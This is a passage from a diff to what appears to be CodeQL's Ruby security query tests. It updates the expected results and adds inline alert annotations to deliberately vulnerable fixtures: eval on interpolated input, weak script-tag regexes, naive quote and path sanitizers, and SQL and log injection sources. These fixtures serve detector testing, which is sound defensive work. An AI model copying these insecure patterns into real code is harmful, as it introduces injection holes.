ActiveRecordInjection.rb:117:25:117:49 | "b #{...}" | This SQL query depends on a $@. | ActiveRecordInjection.rb:117:30:117:35 | call to params | user-provided value | -| ActiveRecordInjection.rb:118:27:118:51 | "b #{...}" | ActiveRecordInjection.rb:118:32:118:37 | call to params | ActiveRecordInjection.rb:118:27:118:51 | "b #{...}" | This SQL query depends on a $@. | ActiveRecordInjection.rb:118:32:118:37 | call to params | user-provided value | -| ActiveRecordInjection.rb:119:21:119:35 | ...[...] | ActiveRecordInjection.rb:119:21:119:26 | call to params | ActiveRecordInjection.rb:119:21:119:35 | ...[...] | This SQL query depends on a $@. | ActiveRecordInjection.rb:119:21:119:26 | call to params | user-provided value | -| ActiveRecordInjection.rb:120:21:120:35 | ...[...] | ActiveRecordInjection.rb:120:21:120:26 | call to params | ActiveRecordInjection.rb:120:21:120:35 | ...[...] | This SQL query depends on a $@. | ActiveRecordInjection.rb:120:21:120:26 | call to params | user-provided value | -| ActiveRecordInjection.rb:121:20:121:34 | ...[...] | ActiveRecordInjection.rb:121:20:121:25 | call to params | ActiveRecordInjection.rb:121:20:121:34 | ...[...] | This SQL query depends on a $@. | ActiveRecordInjection.rb:121:20:121:25 | call to params | user-provided value | -| ActiveRecordInjection.rb:123:23:123:47 | ...[...] | ActiveRecordInjection.rb:123:23:123:28 | call to params | ActiveRecordInjection.rb:123:23:123:47 | ...[...] | This SQL query depends on a $@. | ActiveRecordInjection.rb:123:23:123:28 | call to params | user-provided value | -| ActiveRecordInjection.rb:127:19:127:30 | ...[...] | ActiveRecordInjection.rb:127:19:127:24 | call to params | ActiveRecordInjection.rb:127:19:127:30 | ...[...] | This SQL query depends on a $@. | ActiveRecordInjection.rb:127:19:127:24 | call to params | user-provided value | -| ActiveRecordInjection.rb:129:29:129:39 | ...[...] | ActiveRecordInjection.rb:129:29:129:34 | call to params | ActiveRecordInjection.rb:129:29:129:39 | ...[...] | This SQL query depends on a $@. | ActiveRecordInjection.rb:129:29:129:34 | call to params | user-provided value | -| ActiveRecordInjection.rb:141:20:141:32 | ... + ... | ActiveRecordInjection.rb:135:10:135:15 | call to params | ActiveRecordInjection.rb:141:20:141:32 | ... + ... | This SQL query depends on a $@. | ActiveRecordInjection.rb:135:10:135:15 | call to params | user-provided value | -| ActiveRecordInjection.rb:174:21:174:44 | ...[...] | ActiveRecordInjection.rb:174:21:174:26 | call to params | ActiveRecordInjection.rb:174:21:174:44 | ...[...] | This SQL query depends on a $@. | ActiveRecordInjection.rb:174:21:174:26 | call to params | user-provided value | -| ActiveRecordInjection.rb:188:27:188:76 | "this is an unsafe annotation:..." | ActiveRecordInjection.rb:188:59:188:64 | call to params | ActiveRecordInjection.rb:188:27:188:76 | "this is an unsafe annotation:..." | This SQL query depends on a $@. | ActiveRecordInjection.rb:188:59:188:64 | call to params | user-provided value | -| ActiveRecordInjection.rb:201:37:201:41 | query | ActiveRecordInjection.rb:206:5:206:10 | call to params | ActiveRecordInjection.rb:201:37:201:41 | query | This SQL query depends on a $@. | ActiveRecordInjection.rb:206:5:206:10 | call to params | user-provided value | -| ActiveRecordInjection.rb:210:43:210:104 | "SELECT * FROM users WHERE id ..." | ActiveRecordInjection.rb:206:5:206:10 | call to params | ActiveRecordInjection.rb:210:43:210:104 | "SELECT * FROM users WHERE id ..." | This SQL query depends on a $@. | ActiveRecordInjection.rb:206:5:206:10 | call to params | user-provided value | -| ActiveRecordInjection.rb:211:35:211:96 | "SELECT * FROM users WHERE id ..." | ActiveRecordInjection.rb:206:5:206:10 | call to params | ActiveRecordInjection.rb:211:35:211:96 | "SELECT * FROM users WHERE id ..." | This SQL query depends on a $@. | ActiveRecordInjection.rb:206:5:206:10 | call to params | user-provided value | -| ActiveRecordInjection.rb:216:38:216:53 | "role = #{...}" | ActiveRecordInjection.rb:222:29:222:34 | call to params | ActiveRecordInjection.rb:216:38:216:53 | "role = #{...}" | This SQL query depends on a $@. | ActiveRecordInjection.rb:222:29:222:34 | call to params | user-provided value | -| ArelInjection.rb:6:20:6:61 | "SELECT * FROM users WHERE nam..." | ArelInjection.rb:4:12:4:17 | call to params | ArelInjection.rb:6:20:6:61 | "SELECT * FROM users WHERE nam..." | This SQL query depends on a $@. | ArelInjection.rb:4:12:4:17 | call to params | user-provided value | -| ArelInjection.rb:7:39:7:80 | "SELECT * FROM users WHERE nam..." | ArelInjection.rb:4:12:4:17 | call to params | ArelInjection.rb:7:39:7:80 | "SELECT * FROM users WHERE nam..." | This SQL query depends on a $@. | ArelInjection.rb:4:12:4:17 | call to params | user-provided value | -| PgInjection.rb:14:15:14:18 | qry1 | PgInjection.rb:6:12:6:17 | call to params | PgInjection.rb:14:15:14:18 | qry1 | This SQL query depends on a $@. | PgInjection.rb:6:12:6:17 | call to params | user-provided value | -| PgInjection.rb:15:21:15:24 | qry1 | PgInjection.rb:6:12:6:17 | call to params | PgInjection.rb:15:21:15:24 | qry1 | This SQL query depends on a $@. | PgInjection.rb:6:12:6:17 | call to params | user-provided value | -| PgInjection.rb:20:22:20:25 | qry2 | PgInjection.rb:6:12:6:17 | call to params | PgInjection.rb:20:22:20:25 | qry2 | This SQL query depends on a $@. | PgInjection.rb:6:12:6:17 | call to params | user-provided value | -| PgInjection.rb:21:28:21:31 | qry2 | PgInjection.rb:6:12:6:17 | call to params | PgInjection.rb:21:28:21:31 | qry2 | This SQL query depends on a $@. | PgInjection.rb:6:12:6:17 | call to params | user-provided value | -| PgInjection.rb:32:29:32:32 | qry3 | PgInjection.rb:6:12:6:17 | call to params | PgInjection.rb:32:29:32:32 | qry3 | This SQL query depends on a $@. | PgInjection.rb:6:12:6:17 | call to params | user-provided value | -| PgInjection.rb:44:29:44:32 | qry3 | PgInjection.rb:6:12:6:17 | call to params | PgInjection.rb:44:29:44:32 | qry3 | This SQL query depends on a $@. | PgInjection.rb:6:12:6:17 | call to params | user-provided value | diff --git a/ruby/ql/test/query-tests/security/cwe-089/SqlInjection.qlref b/ruby/ql/test/query-tests/security/cwe-089/SqlInjection.qlref index bcb55c8510f1..7fb79e3340de 100644 --- a/ruby/ql/test/query-tests/security/cwe-089/SqlInjection.qlref +++ b/ruby/ql/test/query-tests/security/cwe-089/SqlInjection.qlref @@ -1 +1,2 @@ -queries/security/cwe-089/SqlInjection.ql +query: queries/security/cwe-089/SqlInjection.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/ruby/ql/test/query-tests/security/cwe-094/UnsafeCodeConstruction/UnsafeCodeConstruction.expected b/ruby/ql/test/query-tests/security/cwe-094/UnsafeCodeConstruction/UnsafeCodeConstruction.expected index eae7c03a716e..8232d96d8b76 100644 --- a/ruby/ql/test/query-tests/security/cwe-094/UnsafeCodeConstruction/UnsafeCodeConstruction.expected +++ b/ruby/ql/test/query-tests/security/cwe-094/UnsafeCodeConstruction/UnsafeCodeConstruction.expected @@ -1,3 +1,15 @@ +#select +| impl/unsafeCode.rb:3:17:3:25 | #{...} | impl/unsafeCode.rb:2:12:2:17 | target | impl/unsafeCode.rb:3:17:3:25 | #{...} | This string interpolation which depends on $@ is later $@. | impl/unsafeCode.rb:2:12:2:17 | target | library input | impl/unsafeCode.rb:3:5:3:27 | call to eval | interpreted as code | +| impl/unsafeCode.rb:8:30:8:30 | x | impl/unsafeCode.rb:7:12:7:12 | x | impl/unsafeCode.rb:8:30:8:30 | x | This string format which depends on $@ is later $@. | impl/unsafeCode.rb:7:12:7:12 | x | library input | impl/unsafeCode.rb:8:5:8:32 | call to eval | interpreted as code | +| impl/unsafeCode.rb:13:33:13:33 | x | impl/unsafeCode.rb:12:12:12:12 | x | impl/unsafeCode.rb:13:33:13:33 | x | This string format which depends on $@ is later $@. | impl/unsafeCode.rb:12:12:12:12 | x | library input | impl/unsafeCode.rb:13:5:13:35 | call to eval | interpreted as code | +| impl/unsafeCode.rb:29:10:29:15 | my_arr | impl/unsafeCode.rb:28:17:28:22 | my_arr | impl/unsafeCode.rb:29:10:29:15 | my_arr | This array which depends on $@ is later $@. | impl/unsafeCode.rb:28:17:28:22 | my_arr | library input | impl/unsafeCode.rb:29:5:29:27 | call to eval | interpreted as code | +| impl/unsafeCode.rb:34:10:34:12 | arr | impl/unsafeCode.rb:32:21:32:21 | x | impl/unsafeCode.rb:34:10:34:12 | arr | This array which depends on $@ is later $@. | impl/unsafeCode.rb:32:21:32:21 | x | library input | impl/unsafeCode.rb:34:5:34:24 | call to eval | interpreted as code | +| impl/unsafeCode.rb:40:10:40:12 | arr | impl/unsafeCode.rb:37:15:37:15 | x | impl/unsafeCode.rb:40:10:40:12 | arr | This array which depends on $@ is later $@. | impl/unsafeCode.rb:37:15:37:15 | x | library input | impl/unsafeCode.rb:40:5:40:24 | call to eval | interpreted as code | +| impl/unsafeCode.rb:44:10:44:12 | arr | impl/unsafeCode.rb:37:15:37:15 | x | impl/unsafeCode.rb:44:10:44:12 | arr | This array which depends on $@ is later $@. | impl/unsafeCode.rb:37:15:37:15 | x | library input | impl/unsafeCode.rb:44:5:44:24 | call to eval | interpreted as code | +| impl/unsafeCode.rb:49:9:49:12 | #{...} | impl/unsafeCode.rb:47:15:47:15 | x | impl/unsafeCode.rb:49:9:49:12 | #{...} | This string interpolation which depends on $@ is later $@. | impl/unsafeCode.rb:47:15:47:15 | x | library input | impl/unsafeCode.rb:51:5:51:13 | call to eval | interpreted as code | +| impl/unsafeCode.rb:55:22:55:22 | x | impl/unsafeCode.rb:54:21:54:21 | x | impl/unsafeCode.rb:55:22:55:22 | x | This string concatenation which depends on $@ is later $@. | impl/unsafeCode.rb:54:21:54:21 | x | library input | impl/unsafeCode.rb:56:5:56:13 | call to eval | interpreted as code | +| impl/unsafeCode.rb:61:10:61:12 | arr | impl/unsafeCode.rb:59:21:59:21 | x | impl/unsafeCode.rb:61:10:61:12 | arr | This array which depends on $@ is later $@. | impl/unsafeCode.rb:59:21:59:21 | x | library input | impl/unsafeCode.rb:61:5:61:23 | call to eval | interpreted as code | +| impl/unsafeCode.rb:64:10:64:13 | arr2 | impl/unsafeCode.rb:59:24:59:24 | y | impl/unsafeCode.rb:64:10:64:13 | arr2 | This array which depends on $@ is later $@. | impl/unsafeCode.rb:59:24:59:24 | y | library input | impl/unsafeCode.rb:64:5:64:25 | call to eval | interpreted as code | edges | impl/unsafeCode.rb:2:12:2:17 | target | impl/unsafeCode.rb:3:17:3:25 | #{...} | provenance | | | impl/unsafeCode.rb:7:12:7:12 | x | impl/unsafeCode.rb:8:30:8:30 | x | provenance | | @@ -61,15 +73,3 @@ nodes | impl/unsafeCode.rb:63:30:63:30 | y | semmle.label | y | | impl/unsafeCode.rb:64:10:64:13 | arr2 | semmle.label | arr2 | subpaths -#select -| impl/unsafeCode.rb:3:17:3:25 | #{...} | impl/unsafeCode.rb:2:12:2:17 | target | impl/unsafeCode.rb:3:17:3:25 | #{...} | This string interpolation which depends on $@ is later $@. | impl/unsafeCode.rb:2:12:2:17 | target | library input | impl/unsafeCode.rb:3:5:3:27 | call to eval | interpreted as code | -| impl/unsafeCode.rb:8:30:8:30 | x | impl/unsafeCode.rb:7:12:7:12 | x | impl/unsafeCode.rb:8:30:8:30 | x | This string format which depends on $@ is later $@. | impl/unsafeCode.rb:7:12:7:12 | x | library input | impl/unsafeCode.rb:8:5:8:32 | call to eval | interpreted as code | -| impl/unsafeCode.rb:13:33:13:33 | x | impl/unsafeCode.rb:12:12:12:12 | x | impl/unsafeCode.rb:13:33:13:33 | x | This string format which depends on $@ is later $@. | impl/unsafeCode.rb:12:12:12:12 | x | library input | impl/unsafeCode.rb:13:5:13:35 | call to eval | interpreted as code | -| impl/unsafeCode.rb:29:10:29:15 | my_arr | impl/unsafeCode.rb:28:17:28:22 | my_arr | impl/unsafeCode.rb:29:10:29:15 | my_arr | This array which depends on $@ is later $@. | impl/unsafeCode.rb:28:17:28:22 | my_arr | library input | impl/unsafeCode.rb:29:5:29:27 | call to eval | interpreted as code | -| impl/unsafeCode.rb:34:10:34:12 | arr | impl/unsafeCode.rb:32:21:32:21 | x | impl/unsafeCode.rb:34:10:34:12 | arr | This array which depends on $@ is later $@. | impl/unsafeCode.rb:32:21:32:21 | x | library input | impl/unsafeCode.rb:34:5:34:24 | call to eval | interpreted as code | -| impl/unsafeCode.rb:40:10:40:12 | arr | impl/unsafeCode.rb:37:15:37:15 | x | impl/unsafeCode.rb:40:10:40:12 | arr | This array which depends on $@ is later $@. | impl/unsafeCode.rb:37:15:37:15 | x | library input | impl/unsafeCode.rb:40:5:40:24 | call to eval | interpreted as code | -| impl/unsafeCode.rb:44:10:44:12 | arr | impl/unsafeCode.rb:37:15:37:15 | x | impl/unsafeCode.rb:44:10:44:12 | arr | This array which depends on $@ is later $@. | impl/unsafeCode.rb:37:15:37:15 | x | library input | impl/unsafeCode.rb:44:5:44:24 | call to eval | interpreted as code | -| impl/unsafeCode.rb:49:9:49:12 | #{...} | impl/unsafeCode.rb:47:15:47:15 | x | impl/unsafeCode.rb:49:9:49:12 | #{...} | This string interpolation which depends on $@ is later $@. | impl/unsafeCode.rb:47:15:47:15 | x | library input | impl/unsafeCode.rb:51:5:51:13 | call to eval | interpreted as code | -| impl/unsafeCode.rb:55:22:55:22 | x | impl/unsafeCode.rb:54:21:54:21 | x | impl/unsafeCode.rb:55:22:55:22 | x | This string concatenation which depends on $@ is later $@. | impl/unsafeCode.rb:54:21:54:21 | x | library input | impl/unsafeCode.rb:56:5:56:13 | call to eval | interpreted as code | -| impl/unsafeCode.rb:61:10:61:12 | arr | impl/unsafeCode.rb:59:21:59:21 | x | impl/unsafeCode.rb:61:10:61:12 | arr | This array which depends on $@ is later $@. | impl/unsafeCode.rb:59:21:59:21 | x | library input | impl/unsafeCode.rb:61:5:61:23 | call to eval | interpreted as code | -| impl/unsafeCode.rb:64:10:64:13 | arr2 | impl/unsafeCode.rb:59:24:59:24 | y | impl/unsafeCode.rb:64:10:64:13 | arr2 | This array which depends on $@ is later $@. | impl/unsafeCode.rb:59:24:59:24 | y | library input | impl/unsafeCode.rb:64:5:64:25 | call to eval | interpreted as code | diff --git a/ruby/ql/test/query-tests/security/cwe-094/UnsafeCodeConstruction/UnsafeCodeConstruction.qlref b/ruby/ql/test/query-tests/security/cwe-094/UnsafeCodeConstruction/UnsafeCodeConstruction.qlref index ec336901db5b..184c870500de 100644 --- a/ruby/ql/test/query-tests/security/cwe-094/UnsafeCodeConstruction/UnsafeCodeConstruction.qlref +++ b/ruby/ql/test/query-tests/security/cwe-094/UnsafeCodeConstruction/UnsafeCodeConstruction.qlref @@ -1 +1,2 @@ -queries/security/cwe-094/UnsafeCodeConstruction.ql \ No newline at end of file +query: queries/security/cwe-094/UnsafeCodeConstruction.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/ruby/ql/test/query-tests/security/cwe-094/UnsafeCodeConstruction/impl/unsafeCode.rb b/ruby/ql/test/query-tests/security/cwe-094/UnsafeCodeConstruction/impl/unsafeCode.rb index b69048f63288..3c92cea5c8ce 100644 --- a/ruby/ql/test/query-tests/security/cwe-094/UnsafeCodeConstruction/impl/unsafeCode.rb +++ b/ruby/ql/test/query-tests/security/cwe-094/UnsafeCodeConstruction/impl/unsafeCode.rb @@ -1,16 +1,16 @@ class Foobar - def foo1(target) - eval("foo = #{target}") # NOT OK + def foo1(target) # $ Source + eval("foo = #{target}") # NOT OK # $ Alert end # sprintf - def foo2(x) - eval(sprintf("foo = %s", x)) # NOT OK + def foo2(x) # $ Source + eval(sprintf("foo = %s", x)) # NOT OK # $ Alert end # String#% - def foo3(x) - eval("foo = %{foo}" % {foo: x}) # NOT OK + def foo3(x) # $ Source + eval("foo = %{foo}" % {foo: x}) # NOT OK # $ Alert end def indirect_eval(x) @@ -25,42 +25,42 @@ def named_code(code) eval("def \n #{code} \n end") # OK - parameter is named code end - def joinStuff(my_arr) - eval(my_arr.join("\n")) # NOT OK + def joinStuff(my_arr) # $ Source + eval(my_arr.join("\n")) # NOT OK # $ Alert end - def joinWithElemt(x) + def joinWithElemt(x) # $ Source arr = [x, "foobar"] - eval(arr.join("\n")) # NOT OK + eval(arr.join("\n")) # NOT OK # $ Alert end - def pushArr(x, y) + def pushArr(x, y) # $ Source arr = [] arr.push(x) - eval(arr.join("\n")) # NOT OK + eval(arr.join("\n")) # NOT OK # $ Alert arr2 = [] arr2 << y - eval(arr.join("\n")) # NOT OK + eval(arr.join("\n")) # NOT OK # $ Alert end - def hereDoc(x) + def hereDoc(x) # $ Source foo = <<~HERE - #{x} + #{x} # $ Alert HERE eval(foo) # NOT OK end - def string_concat(x) - foo = "foo = " + x + def string_concat(x) # $ Source + foo = "foo = " + x # $ Alert eval(foo) # NOT OK end - def join_indirect(x, y) + def join_indirect(x, y) # $ Source arr = Array(x) - eval(arr.join(" ")) # NOT OK + eval(arr.join(" ")) # NOT OK # $ Alert arr2 = [Array(["foo = ", y]).join(" ")] - eval(arr2.join("\n")) # NOT OK + eval(arr2.join("\n")) # NOT OK # $ Alert end end diff --git a/ruby/ql/test/query-tests/security/cwe-116/BadTagFilter/BadTagFilter.qlref b/ruby/ql/test/query-tests/security/cwe-116/BadTagFilter/BadTagFilter.qlref index 6780ef6d4c88..d0ba313d71eb 100644 --- a/ruby/ql/test/query-tests/security/cwe-116/BadTagFilter/BadTagFilter.qlref +++ b/ruby/ql/test/query-tests/security/cwe-116/BadTagFilter/BadTagFilter.qlref @@ -1 +1,2 @@ -queries/security/cwe-116/BadTagFilter.ql \ No newline at end of file +query: queries/security/cwe-116/BadTagFilter.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/ruby/ql/test/query-tests/security/cwe-116/BadTagFilter/test.rb b/ruby/ql/test/query-tests/security/cwe-116/BadTagFilter/test.rb index dd4a074c7846..d9940d35551e 100644 --- a/ruby/ql/test/query-tests/security/cwe-116/BadTagFilter/test.rb +++ b/ruby/ql/test/query-tests/security/cwe-116/BadTagFilter/test.rb @@ -1,22 +1,22 @@ filters = [ - /.*?<\/script>/i, # NOT OK - doesn't match newlines or `` - /.*?<\/script>/im, # NOT OK - doesn't match `` + /.*?<\/script>/i, # NOT OK - doesn't match newlines or `` # $ Alert + /.*?<\/script>/im, # NOT OK - doesn't match `` # $ Alert /.*?<\/script[^>]*>/im, # OK //im, # OK - we don't care regexps that only match comments /)|([^\/\s>]+)[\S\s]*?>/, # NOT OK - doesn't match comments with the right capture groups - /<(?:(?:\/([^>]+)>)|(?:!--([\S|\s]*?)-->)|(?:([^\/\s>]+)((?:\s+[\w\-:.]+(?:\s*=\s*?(?:(?:"[^"]*")|(?:'[^']*')|[^\s"'\/>]+))?)*)[\S\s]*?(\/?)>))/, # NOT OK - capture groups + /]*>([\s\S]*?)<\/script>/gi, # NOT OK - too strict matching on the end tag # $ Alert + /<(?:!--([\S|\s]*?)-->)|([^\/\s>]+)[\S\s]*?>/, # NOT OK - doesn't match comments with the right capture groups # $ Alert + /<(?:(?:\/([^>]+)>)|(?:!--([\S|\s]*?)-->)|(?:([^\/\s>]+)((?:\s+[\w\-:.]+(?:\s*=\s*?(?:(?:"[^"]*")|(?:'[^']*')|[^\s"'\/>]+))?)*)[\S\s]*?(\/?)>))/, # NOT OK - capture groups # $ Alert ] doFilters(filters) \ No newline at end of file diff --git a/ruby/ql/test/query-tests/security/cwe-116/IncompleteSanitization/IncompleteSanitization.qlref b/ruby/ql/test/query-tests/security/cwe-116/IncompleteSanitization/IncompleteSanitization.qlref index 966c74aaf64b..e7f5463e7941 100644 --- a/ruby/ql/test/query-tests/security/cwe-116/IncompleteSanitization/IncompleteSanitization.qlref +++ b/ruby/ql/test/query-tests/security/cwe-116/IncompleteSanitization/IncompleteSanitization.qlref @@ -1 +1,2 @@ -queries/security/cwe-116/IncompleteSanitization.ql \ No newline at end of file +query: queries/security/cwe-116/IncompleteSanitization.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/ruby/ql/test/query-tests/security/cwe-116/IncompleteSanitization/tst.rb b/ruby/ql/test/query-tests/security/cwe-116/IncompleteSanitization/tst.rb index f59fdd332aed..f9b37b12c6af 100644 --- a/ruby/ql/test/query-tests/security/cwe-116/IncompleteSanitization/tst.rb +++ b/ruby/ql/test/query-tests/security/cwe-116/IncompleteSanitization/tst.rb @@ -1,91 +1,91 @@ def bad1(s) - s.sub "'", "" # NOT OK - s.sub! "'", "" # NOT OK + s.sub "'", "" # NOT OK # $ Alert + s.sub! "'", "" # NOT OK # $ Alert end def bad2(s) - s.sub /'/, "" # NOT OK - s.sub! /'/, "" # NOT OK + s.sub /'/, "" # NOT OK # $ Alert + s.sub! /'/, "" # NOT OK # $ Alert end def bad3(s1, s2, s3) - s1.gsub /'/, "\\'" # NOT OK - s1.gsub /'/, '\\\'' # NOT OK - s2.gsub! /'/, "\\'" # NOT OK - s3.gsub! /'/, '\\\'' # NOT OK + s1.gsub /'/, "\\'" # NOT OK # $ Alert + s1.gsub /'/, '\\\'' # NOT OK # $ Alert + s2.gsub! /'/, "\\'" # NOT OK # $ Alert + s3.gsub! /'/, '\\\'' # NOT OK # $ Alert end def bad4(s1, s2, s3) - s1.gsub /'/, "\\\\\\&" # NOT OK - s1.gsub /'/, '\\\\\&' # NOT OK - s2.gsub! /'/, "\\\\\\&" # NOT OK - s3.gsub! /'/, '\\\\\&' # NOT OK + s1.gsub /'/, "\\\\\\&" # NOT OK # $ Alert + s1.gsub /'/, '\\\\\&' # NOT OK # $ Alert + s2.gsub! /'/, "\\\\\\&" # NOT OK # $ Alert + s3.gsub! /'/, '\\\\\&' # NOT OK # $ Alert end def bad5(s) - s.gsub /['"]/, '\\\\\&' # NOT OK - s.gsub! /['"]/, '\\\\\&' # NOT OK + s.gsub /['"]/, '\\\\\&' # NOT OK # $ Alert + s.gsub! /['"]/, '\\\\\&' # NOT OK # $ Alert end def bad6(s) - s.gsub /(['"])/, '\\\\\\1' # NOT OK - s.gsub! /(['"])/, '\\\\\\1' # NOT OK + s.gsub /(['"])/, '\\\\\\1' # NOT OK # $ Alert + s.gsub! /(['"])/, '\\\\\\1' # NOT OK # $ Alert end def bad7(s) - s.gsub /('|")/, '\\\\\1' # NOT OK - s.gsub! /('|")/, '\\\\\1' # NOT OK + s.gsub /('|")/, '\\\\\1' # NOT OK # $ Alert + s.gsub! /('|")/, '\\\\\1' # NOT OK # $ Alert end def bad8(s) - s.sub '|', '' # NOT OK - s.sub! '|', '' # NOT OK + s.sub '|', '' # NOT OK # $ Alert + s.sub! '|', '' # NOT OK # $ Alert end def bad9(s1, s2, s3, s4) - s1.gsub /"/, "\\\"" # NOT OK - s1.gsub /"/, '\\"' # NOT OK - s1.gsub '"', '\\"' # NOT OK - s2.gsub! /"/, "\\\"" # NOT OK - s3.gsub! /"/, '\\"' # NOT OK - s4.gsub! '"', '\\"' # NOT OK + s1.gsub /"/, "\\\"" # NOT OK # $ Alert + s1.gsub /"/, '\\"' # NOT OK # $ Alert + s1.gsub '"', '\\"' # NOT OK # $ Alert + s2.gsub! /"/, "\\\"" # NOT OK # $ Alert + s3.gsub! /"/, '\\"' # NOT OK # $ Alert + s4.gsub! '"', '\\"' # NOT OK # $ Alert end def bad10(s) - s.sub "/", "%2F" # NOT OK - s.sub! "/", "%2F" # NOT OK + s.sub "/", "%2F" # NOT OK # $ Alert + s.sub! "/", "%2F" # NOT OK # $ Alert end def bad11(s) - s.sub "%25", "%" # NOT OK - s.sub! "%25", "%" # NOT OK + s.sub "%25", "%" # NOT OK # $ Alert + s.sub! "%25", "%" # NOT OK # $ Alert end def bad12(s) - s.sub %q['], %q[] # NOT OK - s.sub! %q['], %q[] # NOT OK + s.sub %q['], %q[] # NOT OK # $ Alert + s.sub! %q['], %q[] # NOT OK # $ Alert end def bad13(s) - s.sub "'" + "", "" # NOT OK - s.sub! "'" + "", "" # NOT OK + s.sub "'" + "", "" # NOT OK # $ Alert + s.sub! "'" + "", "" # NOT OK # $ Alert end def bad14(s) - s.sub "'", "" + "" # NOT OK - s.sub! "'", "" + "" # NOT OK + s.sub "'", "" + "" # NOT OK # $ Alert + s.sub! "'", "" + "" # NOT OK # $ Alert end def bad15(s) - s.sub "'" + "", "" + "" # NOT OK - s.sub! "'" + "", "" + "" # NOT OK + s.sub "'" + "", "" + "" # NOT OK # $ Alert + s.sub! "'" + "", "" + "" # NOT OK # $ Alert end def bad16(s) indirect = /'/ - s.sub(indirect, "") # NOT OK - s.sub!(indirect, "") # NOT OK + s.sub(indirect, "") # NOT OK # $ Alert + s.sub!(indirect, "") # NOT OK # $ Alert end def good1a(s) @@ -212,15 +212,15 @@ def good13a(s) s.sub('[', '').sub(']', '') # OK s.sub('(', '').sub(')', '') # OK s.sub('{', '').sub('}', '') # OK - s.sub('<', '').sub('>', '') # NOT OK: too common as a bad HTML sanitizer + s.sub('<', '').sub('>', '') # NOT OK: too common as a bad HTML sanitizer # $ Alert - s.sub('[', '\\[').sub(']', '\\]') # NOT OK - s.sub('{', '\\{').sub('}', '\\}') # NOT OK + s.sub('[', '\\[').sub(']', '\\]') # NOT OK # $ Alert + s.sub('{', '\\{').sub('}', '\\}') # NOT OK # $ Alert s = s.sub('[', '') # OK s = s.sub(']', '') # OK s.sub(/{/, '').sub(/}/, '') # OK - s.sub(']', '').sub('[', '') # probably OK, but still flagged + s.sub(']', '').sub('[', '') # probably OK, but still flagged # $ Alert end def good13b(s1) @@ -245,8 +245,8 @@ def newlines_a(a, b, c) # motivation for whitelist `which emacs`.sub("\n", "") # OK - a.sub("\n", "").sub(b, c) # NOT OK - a.sub(b, c).sub("\n", "") # NOT OK + a.sub("\n", "").sub(b, c) # NOT OK # $ Alert + a.sub(b, c).sub("\n", "") # NOT OK # $ Alert end def newlines_b(a, b, c) @@ -255,18 +255,18 @@ def newlines_b(a, b, c) output.sub!("\n", "") # OK d = a.dup - d.sub!("\n", "") # NOT OK + d.sub!("\n", "") # NOT OK # $ Alert d.sub!(b, c) e = a.dup d.sub!(b, c) - d.sub!("\n", "") # NOT OK + d.sub!("\n", "") # NOT OK # $ Alert end def bad_path_sanitizer(p1, p2) # attempt at path sanitization - p1.sub! "/../", "" # NOT OK - p2.sub "/../", "" # NOT OK + p1.sub! "/../", "" # NOT OK # $ Alert + p2.sub "/../", "" # NOT OK # $ Alert end def each_line_sanitizer(p1) diff --git a/ruby/ql/test/query-tests/security/cwe-117/LogInjection.expected b/ruby/ql/test/query-tests/security/cwe-117/LogInjection.expected index 85299a98c289..123b65ba6767 100644 --- a/ruby/ql/test/query-tests/security/cwe-117/LogInjection.expected +++ b/ruby/ql/test/query-tests/security/cwe-117/LogInjection.expected @@ -1,3 +1,11 @@ +#select +| app/controllers/users_controller.rb:16:19:16:29 | unsanitized | app/controllers/users_controller.rb:15:19:15:24 | call to params | app/controllers/users_controller.rb:16:19:16:29 | unsanitized | Log entry depends on a $@. | app/controllers/users_controller.rb:15:19:15:24 | call to params | user-provided value | +| app/controllers/users_controller.rb:17:19:17:41 | ... + ... | app/controllers/users_controller.rb:15:19:15:24 | call to params | app/controllers/users_controller.rb:17:19:17:41 | ... + ... | Log entry depends on a $@. | app/controllers/users_controller.rb:15:19:15:24 | call to params | user-provided value | +| app/controllers/users_controller.rb:25:7:25:18 | unsanitized2 | app/controllers/users_controller.rb:15:19:15:24 | call to params | app/controllers/users_controller.rb:25:7:25:18 | unsanitized2 | Log entry depends on a $@. | app/controllers/users_controller.rb:15:19:15:24 | call to params | user-provided value | +| app/controllers/users_controller.rb:27:16:27:39 | ... + ... | app/controllers/users_controller.rb:15:19:15:24 | call to params | app/controllers/users_controller.rb:27:16:27:39 | ... + ... | Log entry depends on a $@. | app/controllers/users_controller.rb:15:19:15:24 | call to params | user-provided value | +| app/controllers/users_controller.rb:34:33:34:43 | unsanitized | app/controllers/users_controller.rb:33:19:33:25 | call to cookies | app/controllers/users_controller.rb:34:33:34:43 | unsanitized | Log entry depends on a $@. | app/controllers/users_controller.rb:33:19:33:25 | call to cookies | user-provided value | +| app/controllers/users_controller.rb:35:33:35:55 | ... + ... | app/controllers/users_controller.rb:33:19:33:25 | call to cookies | app/controllers/users_controller.rb:35:33:35:55 | ... + ... | Log entry depends on a $@. | app/controllers/users_controller.rb:33:19:33:25 | call to cookies | user-provided value | +| app/controllers/users_controller.rb:49:19:49:30 | ...[...] | app/controllers/users_controller.rb:49:19:49:24 | call to params | app/controllers/users_controller.rb:49:19:49:30 | ...[...] | Log entry depends on a $@. | app/controllers/users_controller.rb:49:19:49:24 | call to params | user-provided value | edges | app/controllers/users_controller.rb:15:5:15:15 | unsanitized | app/controllers/users_controller.rb:16:19:16:29 | unsanitized | provenance | | | app/controllers/users_controller.rb:15:5:15:15 | unsanitized | app/controllers/users_controller.rb:17:19:17:41 | ... + ... | provenance | | @@ -42,11 +50,3 @@ nodes | app/controllers/users_controller.rb:49:19:49:24 | call to params | semmle.label | call to params | | app/controllers/users_controller.rb:49:19:49:30 | ...[...] | semmle.label | ...[...] | subpaths -#select -| app/controllers/users_controller.rb:16:19:16:29 | unsanitized | app/controllers/users_controller.rb:15:19:15:24 | call to params | app/controllers/users_controller.rb:16:19:16:29 | unsanitized | Log entry depends on a $@. | app/controllers/users_controller.rb:15:19:15:24 | call to params | user-provided value | -| app/controllers/users_controller.rb:17:19:17:41 | ... + ... | app/controllers/users_controller.rb:15:19:15:24 | call to params | app/controllers/users_controller.rb:17:19:17:41 | ... + ... | Log entry depends on a $@. | app/controllers/users_controller.rb:15:19:15:24 | call to params | user-provided value | -| app/controllers/users_controller.rb:25:7:25:18 | unsanitized2 | app/controllers/users_controller.rb:15:19:15:24 | call to params | app/controllers/users_controller.rb:25:7:25:18 | unsanitized2 | Log entry depends on a $@. | app/controllers/users_controller.rb:15:19:15:24 | call to params | user-provided 